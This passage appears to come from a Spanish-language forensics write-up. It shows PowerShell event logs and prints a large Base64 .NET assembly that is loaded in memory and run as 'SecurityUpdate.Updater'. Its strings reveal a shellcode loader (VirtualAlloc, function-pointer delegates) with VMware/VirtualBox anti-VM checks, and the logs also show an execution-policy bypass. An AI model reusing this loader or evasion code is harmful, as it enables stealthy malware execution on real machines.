AYgBEAHYAOQBvAFkATgBkAEUATwB4AFgAcAA0AGwASABxAHQAagByAFoAdQBQAHMANgBQAGEAbQBBAGEAUAB5ADIAVgB0AFAAQgBMAHAAVwBYAGwAUgBPADMAOABoAHgAcwByAG4AWAB0AEgAbgAyAGEAbgBsAGYASgBCAFkAbABwAEMAbgBDAFIASgBQAHcAMgB2AE8AVABOAGgANABKAEYAeAA2AGUATQBWAGgAZABYAEQAegBtAEQAQwBlAFQAUABOAE4ASQA0ADQATQBsAC8ASwBQAEsAZAAwAFoAawBaAHYAbgB3AFAANAA3ADkANgAxAHYAUwBpAFoAaAA4AFYAaQBHAEUAbwBwAC8ASQByAHoAQgBWAEoAbwBhAGwAYgBLAFgAKwBZAEgATwBJADcAdgBNAG4ASwBHAFMAVAA0AFUAdABsAHYANgBhAEIAMABuAE4AOAA0AGQASgBWAFEAdgB1AC8AQwBHAEsASgBNAFAAVABxAEIAaQBPAEQAcwBlAGoAQQBiADQAOAByADAAbwBBAFQAcwBsAHMAagBrAFoAMQAxAFkAdAAyAC8AYgByAGIAMgBnAGEAbgB0ADkAVwBkAGMAawBVAHAATABpAFAANwBCAEUAQQBtAGMAMwBUAFYAMwBiAFAAQgB4ADUASgBNAHMASwA4AGQANgB2AFQATABqAEkAZgBNAGMATAA5AC8AWgB4AHIAaAAvACsAcgBLAEUAVAB4AE4AYgBqAGYAdQBxAFQAeQA5AHoALwAxAGEALwBWAEgAMgBJAEkAQgBWAFEAZgBTAGgAVABKAG4AMgBxAHEASAA3AHoAMgBhAFcAbwB1AGYAbgBHAFEAUABQAEkATgA4AHAATAA1AEEAYgBHADkASQBVAG8AWgBVADUAKwBLAEIAbABSAE8AaQBCAEYAVgB1AEEAcwB2AGwAMAA0AGcAUQBzADkAUgBlAEUAVQBHAHQANgBYAFoAdAB2AFAANABtAEEAZQAwAHQAbwAzAEYAeAAwAHUATgBEAEcAbABkAGwAegBNAFkAWABsAG4AVwBpADYAYgBTAEUAQQBuAGoAKwBaADIAegAwADcAZQBHADgANwBUAHMATgAzAGQAYgBRADMAeQAwAG4ATwB1ADUAdgB5AC8AeQBSAGUAWQBuAHIARgBpAE4ASwA2AGQAbAAzADEAVwB1AGMAKwAvAFUAQwBLAE4AcwBlAHEATwAwADEARwBJACsATgBQADUAbgB6AFkAbABWAC8AOAB6AHYANgBOAC8AcABuAG0AYwBOADIAOABBAGIAcAB1ADIASQBwAEoAZQA2ADYAagBXAFkASwBCAHUANQBlAFIAWABiAEcAawBlAE0AYwBUAFIAbgBuAGgAMwBXAEcARQAwAHAAUgB6AHoAbQBEAEsAMgBrADgAeQBiADYAMABwAFMAVwArAFYAVQArAFIARwA1ADUAOAA0AHgAaABPAFcAZQBxAFkANABsAFMAcwA1AGIAYgBYAEwAdgB4AGwAQgBxAEsAZAB6ADUAVgBMAEUAZABIAHUAdAAwAFMAaQBVAHQAagBFAEcASABBAEgAbwBOADgAMgBZADEAWABQAHcANQAvAFkARQBtADgASAB2AFQAZgBWAEMAcQBFAEoAUQBnADEAZAA2AFgAbwBBAEgAOAB6AGUAbQB3AEgANgBOAHcAMQBwAC8AVABrADYASAAwAC8ARABLAFEAcQA1AGEAQwBsADMASgBXADkAZgBGAGkALwBPAGEAcAA2AHQANgAzAEQAUABTADAAeQBhAHcAQwBMAGoAcwBKAFAAZwA5AHAAYgBrADAAdABJAHYAUwBkAHcASgBLAHcAVABSADEAcwBuAGUAcgBKAHcAMwBRAFYAMQAxAEkAegBWAEMAbABWAGUATQBCAGsAeAByADkAZQBqAHYAbgBmAHEATAAyAEgAUAAwADUAZwBwAGkAMQBnAHkASAB6AHQAdAA1AGoALwBmAHAAMABlAG8ANQA3AFAATwA3ADkASAB5AGwATwBqAFMATgBMAHoAMQA2AGoAcwA3AG0ANABPAEwAVAAwAG4AcwBRAHYAYwBzAGgARABLAGoAdgBPAHEAUwBnAFgAWABlAHEAWgBwAFQAMwBiAGYAYgBoAFoAYgBMACsAQgBEAHEAWQBkAE4AWABrAEwAZwBNAGoAQwBBAHYATwB2AGgAcgBlAHoAcQB2AEoATwBsAGoAdgBMAGwALwBhAEcAdQBDAFkAZQB5AEIAbABmAFEAdQBkADQAbgBrADgAawBNAFEAUABKAFYAeABlAHMAZwBxAHQANQBKAGkAZgBDAFQAUgBOAHIARQBzADUAYgBvAE8AMwBxAHIAWgBCAGYAbwBSAG0ARgBFAGIAdQBOAGIAYwBLAE4AYQBKAEcANwBCAGwAUgBzAEoAQwA2AG4AdwBZAGQAbQBrAFIAVgBHAGUAZAAvAHAAVwBqAEcAVABRAHcAUABVAEEARQBSAHoAYgBTAG8ASQBWAE4ATAAzAGcAcgBOAGMAVwAxADcAUwBPAGYAbABlAHMAeQArAGkAeAB0AHgANwBIAEkAYgBOAHQAcwBNAGIAaABpAGcANgBwAGEAdABSAGsAMwA1ADMATQBhADAAdQBkADgARABsAHIAaQBNAE4AWQBNAFUARwArAHkAcABWAEUATQB4AG4AOQBYAHoAYwAzAEQASwBoAHMARgBLAE8AMgA3AEoAbgB3AGcAOABVAHQAaABRADIAWgAzACsAYQBOAEYAeQBrAEwAeABFAFIASABtAE4AYQBSAFoAcABSAEoAKwBSAFgAMQBNAFcAdgA3AGkAbAA1AFcAdABqADIASQBhAHQARgA2AGwASQBzAEIAdQBtADkATgBOADUAOQBmAFQANgBPAFYAbQBMAGcAbQBDAGUAbwBXAHUASQBJAEIAagBUAHIAVAB4AFYALwAvAEkAMwB2AG4AVgAwAHcAdgBnAFcAMQB2AEkAVwAzAGQAagBRAFQAdwBXAG4AYgBZADUAagBWAHAAOQBkAEkAWQB2AHoAYgBUAEkAdgBrAFQANgBQAGkAZABkADYATQBwAGMAcQBzAEYAaAAwAFAAeABnAFgASQBOAEMAZwBkAHAASQBZADYATABmAG0AdABPAEcAVQBRAHIAUgA0AFkAawBjAEMAZwBXAHkAMAB6AHYAQwB1AEIAKwB2AFcAZAB5AGMAegBNAGsAcABaAHgAKwBlAFkAcwBQAG8AbgBYAHgAcQBQAHUAWgBNAEYANABXAGMASQA5AEgARQA4ADQAZwBWAGMAQgBzAE8ANQBJAGUAaABsAE0ASAB5ADEAdgBlAEkAWABvAGUAUwBHADYAWABRAGcAbgB5ADEANQBLAHYARABMAFkAZgB1AFMAZABFAHMAMQBZADcARQB6AC8AagBuAGEAZQBVAFoAQwBHAHMATQByAGYAQQArAHQANABCAHkAZABBAFMAVgBVAG8ASwBIAHcASgBPAHcAcABjADUAeABJAFoAbQBrAHYAbwBmAEYAegArAGYAQwBYAFIAMgA0AHIAZgBEAGQAUgBoAGYATgBJAG0AZgBqAFQANQAwAGgARwBJAHIAcwBIAGoAegB4ADYAdgBnAE8AMwBoAGUAWQBjAG0ASABQAGYAdwBIAFYAZABYAG0ARgA4AEMAZABxAHEAcQBBAGwATgAvADQAKwAvAHUAcABkAE8AOAA0AHQARQB3ADEARQBpAGIAdgBhAEoAQgAvAGwAdgBGAGMANABiAFIAaQBoAFcAcwAyAFoASABJAHMAVwB0ADQAYgB1AEsAYwBFAGwANgB2AGsAMgBhAG4AZwBvADUAOABmAEgAYQBtAFAAVQBPAEkAWAByAEEAbwBmAEUANwAyADQAZQBoAHkAaABWAEIASQBzAEIASQBRADkASQBKAE8ASgA1AFEAMAB2AHcATABJAFgAMABNADQAVgBMAGYAUABxAGgAdABLAEkAQgBSAFUAbQBKAFoAYQBaAEQAbwBiAEkAOQBuADEATwAzAGYAQwBnAGcAQgA3AGkAcgBDAEcAWABOAGcAZgB2AHEASABOAHMARgBJAFEANgB6AGsARwBzAGUAcQArAFIARAAyAHoAVABlACsAaQBuAFIAZQBCAG8ANwBWAGoAdwB0AEMAWQBIAGkAWABUAEgAUQBKAFgAbQBMADkAKwBuAE8AWQBBAEgARwBOAGoAagBwAEYAVABrADYANQByAHIALwBHAEkAWgBEADQAagAyAHcANQBsAGUATABlADEAMABSAFoAbwBqAGEAYgB3AGcASwBaAG0AdAA4AFYARQBFAGYANgAwAEkAdwBGAGgAMgBOADgASABZACsAagB5AFkAWQBaAFIANQBvAGwAZwB6AGUASwBNAGYARQB2AEIAcwA5AEUAcwBvAFMAYgB6AEsANgBzADAAMQBaAFoAMQBjADIAdABmAC8AUwBaACsAbAAvADUAbQBrAFoAZQBIAGYASQBXADcATABqAFQAdQBYAEkAdgBrAGQAcQArAFYAaQBzADUAbgBJAHAAMABoAGQAVwBGADcAcABJAG0AYQBCAFAALwA5ADcAUwBwADcAdwBQADMAbQA1AEkANwBlAFAAVwBqAEUAOQAvAFkASQAwACsAawBJAG0ATQBhAFgASQBoAGkAbwAxAG8AVQA4AHAAdgBTAEEAawBGAGEANgB3AEIAQgBnAFcAbwBDAEgANABCAFYAMABVAEgAQgBRAGcAYQBBAFEAWQBGAHEAQwB0AGsAYgBkAGI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")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</string>
</Data>
<Binary></Binary>
</EventData>
</Event>
...
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="PowerShell"></Provider>
<EventID Qualifiers="0">600</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>6</Task>
<Opcode>0</Opcode>
<Keywords>0x0080000000000000</Keywords>
<TimeCreated SystemTime="2023-03-15 19:49:21.931273"></TimeCreated>
<EventRecordID>565</EventRecordID>
<Correlation ActivityID="" RelatedActivityID=""></Correlation>
<Execution ProcessID="0" ThreadID="0"></Execution>
<Channel>Windows PowerShell</Channel>
<Computer>Galax-35</Computer>
<Security UserID=""></Security>
</System>
<EventData><Data><string>Variable</string>
<string>Started</string>
<string> ProviderName=Variable
NewProviderState=Started
SequenceNumber=11
HostName=ConsoleHost
HostVersion=5.1.19041.1237
HostId=572e362c-28a1-40fb-8e11-6906e166d1a2
HostApplication=powershell.exe -Command {Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted}
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</string>
</Data>
<Binary></Binary>
</EventData>
</Event>
</Events>
Se puede ver un payload grande compuesto por una cadena codificada en Base64, cargada en memoria y ejecutada mediante PowerShell:
$bytes = [System.Convert]::FromBase64String("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iQCvAxoAkQCvAwYA2QB/AiwA4QA6AzIA6QDKBDUA8QBsAD4A6QBgA0UAoQCvAxAAoQByBFwAqQChA2EAsQCtBGYAuQDlAmsAmQCQAnAACQF+A3AACQHPBHQACQGKBHAACQEdBHoAsQDBBH8AEQGaAAYAmQCvAwYAJwCDAEICLgALAGABLgATAGkBLgAbAIgBLgAjAJEBLgArAJ8BLgAzAJ8BLgA7AJ8BLgBDAJEBLgBLAKUBLgBTAJ8BLgBbAJ8BLgBjAL0BLgBrAOcBLgBzAPQBCAAGAJUAIAAkAE4AwgJBAQMAGAABAEEBBQAsAAEABIAAAAEAAAAAAAAAAAAAAAAA3AIAAAQAAAAAAAAAAAAAAIMACgAAAAAABAAAAAAAAAAAAAAAjACbBAAAAAADAAIAAAAAPE1vZHVsZT4AbXNjb3JsaWIAZnVuYwBWaXJ0dWFsQWxsb2MAbWV0aG9kAFZpcnR1YWxGcmVlAEVuZEludm9rZQBCZWdpbkludm9rZQBJRGlzcG9zYWJsZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBkd0ZyZWVUeXBlAGZsQWxsb2NhdGlvblR5cGUARGlzcG9zZQBTZWN1cml0eVVwZGF0ZQBNdWx0aWNhc3REZWxlZ2F0ZQBHdWlkQXR0cmlidXRlAFVudmVyaWZpYWJsZUNvZGVBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkd1NpemUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAFRvU3RyaW5nAEFzeW5jQ2FsbGJhY2sAY2FsbGJhY2sATWFyc2hhbABpc1ZpcnR1YWwAa2VybmVsMzIuZGxsAHRlc3RfZGxsLmRsbAB0ZXN0X2RsbABnZXRfSXRlbQBTeXN0ZW0AYm9vbQBTZWN1cml0eUFjdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBNYW5hZ2VtZW50T2JqZWN0Q29sbGVjdGlvbgBSdW4AWmVybwBNYW5hZ2VtZW50T2JqZWN0U2VhcmNoZXIAVXBkYXRlcgBHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcgBUb0xvd2VyAE1hbmFnZW1lbnRPYmplY3RFbnVtZXJhdG9yAEdldEVudW1lcmF0b3IALmN0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBDb250YWlucwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMAbHBBZGRyZXNzAE1hbmFnZW1lbnRCYXNlT2JqZWN0AG9iamVjdABmbFByb3RlY3QAR2V0AElBc3luY1Jlc3VsdAByZXN1bHQAVG9VcHBlckludmFyaWFudABTeXN0ZW0uTWFuYWdlbWVudABnZXRfQ3VycmVudABDb252ZXJ0AE1vdmVOZXh0AENvcHkAb3BfRXF1YWxpdHkAU3lzdGVtLlNlY3VyaXR5AAAAkXk2AHcARABvAFkAdwBZAEEAQQBPAHMAQQBZAEQASQBYAEcAcwBmAEIAUgBnAGIAWgBHADgARQAvAGsAdwBBAEEAVQBBAEIARgBNAEIAUQBPAFIAUQBJAFUARAB1AEwAMgBKADgAdwBxADgAOQBNAHoARwBSADgAZgBuADgAdwA3AGUARgB2AFoAeAArAHkASgBjAEEAYQBDAEsAZgAwAGwAcABXAFYAQgBVADEATgBUADAAdAByAE0AeABZAEIANgBiAEcARgA3AFkAZABmAGsATgBCAEQAaAAxAHcAdQBlAEIATAB2AEYASQBmADYAUQBxAG0AegB1AEIASABxAFEAbwByAGgASABaADMAdABQAE8AaQBQAFMAYwBpAEYAcwA4AFUAWQBPAGwALwA2ADIASgBtAEsAbABIAHcAOAA1AGUATQBsAG8ATgBRAFUAUgAzAC8AWgBSADgAeABQAFoANQBnACsASwB3ADcANgBhAEYAZQBNADcAdQBKAG4AdABaAGQAawBjAHkAdQBYAEwANAAvADgAaQBrAEkARgBYAGcAcAAxAFUAYgBnAEYAMQBIAHkAaQAwAEYAUQBoAHIAVABLAFMAOQBIAGwAaABQAEYAZgBJADMASABWADMATQBtAEEAdQA3AEIAbgBuADUAdQAzAG0AcgB6AE8ARgBPAEYANQBYAGUAWQArAGwAQwBOAEkAaABLAFcAeAB4AHcATgBZAEIAaABWAHAAMgBVAFcAdABHAFQAeQAzADYAUAA3ADEARgBLAGMAVwBNAGYAaABCAGUAWAAwAHgANgBOAG4AdwB2AEYAdABqADYAQwArAFAAdgBsAEEAUgBEAFMAZgBjAGsAWQBTAFIATABNAFoAbQBsAGgAdwB4AFMAYgAwAFYAcwB6AGEAdABMAEMASgA5AHIAZwBWAGwAUgBYAGcAeABXAEsAMABBAGIAaQB0AG8AMABRAFUATwAyAFUAOQA2AHYAcABBAG4AMwBYAEsAVQAxAC8AagBtAGQAdQBFAHkAawBxADQAcwBtAEUANABQAEsASwBtAGIAdgBhAGIASwA5AEwAeQB6AFAAcgBQADMAOQBYAGIAegB1AGYAVQBpAEQAQwBlADkAYgBEAHYAOQBvAFkATgBkAEUATwB4AFgAcAA0AGwASABxAHQAagByAFoAdQBQAHMANgBQAGEAbQBBAGEAUAB5ADIAVgB0AFAAQgBMAHAAVwBYAGwAUgBPADMAOABoAHgAcwByAG4AWAB0AEgAbgAyAGEAbgBsAGYASgBCAFkAbABwAEMAbgBDAFIASgBQAHcAMgB2AE8AVABOAGgANABKAEYAeAA2AGUATQBWAGgAZABYAEQAegBtAEQAQwBlAFQAUABOAE4ASQA0ADQATQBsAC8ASwBQAEsAZAAwAFoAawBaAHYAbgB3AFAANAA3ADkANgAxAHYAUwBpAFoAaAA4AFYAaQBHAEUAbwBwAC8ASQByAHoAQgBWAEoAbwBhAGwAYgBLAFgAKwBZAEgATwBJADcAdgBNAG4ASwBHAFMAVAA0AFUAdABsAHYANgBhAEIAMABuAE4AOAA0AGQASgBWAFEAdgB1AC8AQwBHAEsASgBNAFAAVABxAEIAaQBPAEQAcwBlAGoAQQBiADQAOAByADAAbwBBAFQAcwBsAHMAagBrAFoAMQAxAFkAdAAyAC8AYgByAGIAMgBnAGEAbgB0ADkAVwBkAGMAawBVAHAATABpAFAANwBCAEUAQQBtAGMAMwBUAFYAMwBiAFAAQgB4ADUASgBNAHMASwA4AGQANgB2AFQATABqAEkAZgBNAGMATAA5AC8AWgB4AHIAaAAvACsAcgBLAEUAVAB4AE4AYgBqAGYAdQBxAFQAeQA5AHoALwAxAGEALwBWAEgAMgBJAEkAQgBWAFEAZgBTAGgAVABKAG4AMgBxAHEASAA3AHoAMgBhAFcAbwB1AGYAbgBHAFEAUABQAEkATgA4AHAATAA1AEEAYgBHADkASQBVAG8AWgBVADUAKwBLAEIAbABSAE8AaQBCAEYAVgB1AEEAcwB2AGwAMAA0AGcAUQBzADkAUgBlAEUAVQBHAHQANgBYAFoAdAB2AFAANABtAEEAZQAwAHQAbwAzAEYAeAAwAHUATgBEAEcAbABkAGwAegBNAFkAWABsAG4AVwBpADYAYgBTAEUAQQBuAGoAKwBaADIAegAwADcAZQBHADgANwBUAHMATgAzAGQAYgBRADMAeQAwAG4ATwB1ADUAdgB5AC8AeQBSAGUAWQBuAHIARgBpAE4ASwA2AGQAbAAzADEAVwB1AGMAKwAvAFUAQwBLAE4AcwBlAHEATwAwADEARwBJACsATgBQADUAbgB6AFkAbABWAC8AOAB6AHYANgBOAC8AcABuAG0AYwBOADIAOABBAGIAcAB1ADIASQBwAEoAZQA2ADYAagBXAFkASwBCAHUANQBlAFIAWABiAEcAawBlAE0AYwBUAFIAbgBuAGgAMwBX